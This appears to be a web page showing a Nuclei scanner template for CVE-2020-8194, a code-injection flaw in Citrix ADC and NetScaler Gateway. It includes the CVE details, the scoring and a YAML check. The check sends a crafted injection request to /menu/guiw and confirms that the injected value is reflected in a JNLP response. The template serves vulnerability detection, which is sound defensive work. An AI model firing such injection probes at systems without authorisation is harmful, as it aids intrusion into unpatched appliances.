Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection

ID: CVE-2020-8194

Severity: medium

Author: dwisiswant0

Tags: cve,cve2020,citrix

Description

Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.

YAML Source

id: CVE-2020-8194

info:
  name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection
  author: dwisiswant0
  severity: medium
  description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
  reference:
    - https://support.citrix.com/article/CTX276688
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8194
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8194
    cwe-id: CWE-94
    epss-score: 0.97364
    epss-percentile: 0.999
    cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: citrix
    product: application_delivery_controller_firmware
  tags: cve,cve2020,citrix

http:
  - raw:
      - |
        GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
        Host: {{Hostname}}
        Cookie: startupapp=st

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<jnlp codebase=\"nonexistent.1337\">"

      - type: word
        part: header
        words:
          - "application/x-java-jnlp-file"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ef50910a36bf207f6ad6c0279de7f0664a4d364c88e43bb3972d42c5e9fe5fc0022100b9b9866c48c3ed1b8c202ac6e5b0ee4ea0bac9782011669a5c99160823fa3d55:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8194.yaml"

View on Github